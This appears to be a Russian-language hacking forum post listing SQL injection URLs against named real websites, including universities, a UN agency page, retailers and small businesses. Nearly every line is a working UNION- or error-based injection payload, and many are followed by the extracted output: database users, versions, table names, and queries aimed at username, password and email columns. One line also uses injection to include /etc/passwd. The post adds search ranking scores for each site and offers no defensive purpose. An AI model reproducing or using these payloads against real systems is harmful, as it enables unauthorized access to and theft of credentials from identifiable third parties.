Колонка 3 попадает в функцию include() http://www.ptk-tehgaz.ru/products.php?emc=2&id=-20+union+select+1,2,'../../../../../etc/passwd'--+ магия активирована, поэтому захексим http://www.ptk-tehgaz.ru/products.php?emc=2&id=-20+union+select+1,2,0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764--+
http://aalborgstift.dk/pdb/pview.php?id=-705+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,userId,userName,password),9,10,11+from+user+--+ PR3
http://www.elephant.se/search.php?q=%22%20and%201=2%20union%20select%20CONCAT(user(),0x3a,version())/*%20and%20char(124)%20user%20char(124)=0%22%20and%20%22x%22=%22x
Code: http://www.master-naba.com/page.php?contentId=-377+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29-- username: [email protected] version: 5.0.45-log database: master_naba_com Google PR: 5
ViewSonic ® Code: http://www.viewsonic.com.au/kbase/article.php?id=-128+union+select+1,group_concat%28CHAR%2832,58,32%29%20,username,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15+from+vsau.internal_users%20-- IP: 60.248.78.41 //Тайвань user: web@localhost database: vsau tables Code: activity_log, auction_items, crt_displays, dist_info, ecard_categories, ecard_templates, enews, enews_clicks, eregtmp, finch_prize, finch_redeem, finch_sales_results, internal_groups, internal_users, kbase, lcd_displays, map_state, meta_specs, mktg_assets, model_prices, name_to_id, name_to_models, online_service, order_items, pr, product_info, product_reviews, programs, projectors, res_accounts, res_goods_io, res_inventory, res_level_history, res_sales_info, resellers, resinv_format, ressales_import_log, retained_values, user_info, vote, wareg, web_orders, web_promos
Code: http://www.wesleyan.edu.ph/media.php?id=-17+union+select+version(),2,3,concat(user(),0x3a,database())-- version: 5.0.91-community
http://buddie.me/music.php?id=-113482+union+select+1,concat_ws(0x3a,name,password),3,4+from+users+--+
http://www.sirius.perm.ru/cat.php?part=-7%20and%201=2%20union%20select%201,concat_ws(char(58),@@version,user(),database())+-- 5.0.32-Debian_7etch1 [email protected] dbsirius_1
http://oldtownrestaurant.co.uk/food.php?id=-1+union+select+1,concat_ws(0x3a,USER(),DATABASE(),VERSION()),3,4+--+ oldtown_sql@localhost: oldtown_sql:5.0.92-community
Code: http://www.mapadelisboa.com/li.php?id=-1+union+select+1,2,3,4,group_concat%280x0b,table_name%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+information_schema.tables+-- PR4 Все норм выводится но админку не нашел Code: http://www.profumodizagara.com/ricette/rc.php?id=-1+union+select+1,2,group_concat%280x0b,table_name%29,4,5,6,7,8,9,10,11+from+information_schema.tables+-- PR3, DMOZ
Code: http://www.pchelovod.com/index.php?correct=142%27+and+1=0++Union+Select+concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29--+ 5.1.46: pchelovod_shop@localhost: pchelovod_shop Вывод в титле тиц 60
Code: http://chicken.kiev.ua/news_restoran.phtml?id=-2999+union+select+1,2,3,4,5,6,concat_ws(0x3a,email,login),8,9,10,11,12,13,14+from+login-- ТИЦ 220 PR 4 Code: http://download.in.ua/program.phtml?os=win&id=999999.9+UNION+ALL+SELECT+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C%28SELECT+concat%280x7e%2C0x27%2CCompany.Cm_email%2C0x27%2C0x7e%29+FROM+%60db_westbyte_1%60.Company+Order+by+Cm_email+LIMIT+0%2C1%29+-- Вывод в исходнике. Выводит юзверей. <meta name="keywords" content="~'[email protected]'~" /> Тиц 40 PR 4
Code: http://www.lawyersalliance.com.au/public.php?id=-25+union+select+1,2,cast%28concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29%20as%20binary%29,4,5,6,7,8%20from%20users-- Username: ALA_admin@localhost Version: 4.1.11-standard Database: ALA Google PR: 5 admin
Code: http://www.g1expo.com/artists-ch.php?id=-1+union+select+1,2,3,4,5,group_concat%280x0b,table_name%29,7+from+information_schema.tables+-- PR 5
http://www.teleradiocom.tj/index.php?action=fullnews&id=-50 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,id,username,password),10,11,12,13,14,15,16,17,18,19 from users limit 0,1
helloworld.ru Helloworld.ru Ашибочка Code: http://www.helloworld.ru/show.php?curraz=27+and+1=0+union+select+UNHEX%28HEX%28CONCAT_WS%280x3a,database%28%29,version%28%29,user%28%29%29%20%29%29 hellowor_hello:5.0.91-community:hellowor_hello@localhost
Code: http://www2.hud.ac.uk/staffprofiles/staffcv.php?staffid=-508+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,22-- Username: [email protected] Version: 5.1.55-log Database: staffprofiles Google PR: 4
http://www.unisdr.org/africa/events/index.php?rid=0&timeID=1&tid=0&oid=6)+or+1+group+by+concat((select+concat(user(),0x3a3a,User,0x3a3a,file_priv)+from+mysql.user+limit+3,1),floor(rand(0)*2))+having+min(0)--+&hid=60 Баанк!!!(co Jay & Silent BOB) =)
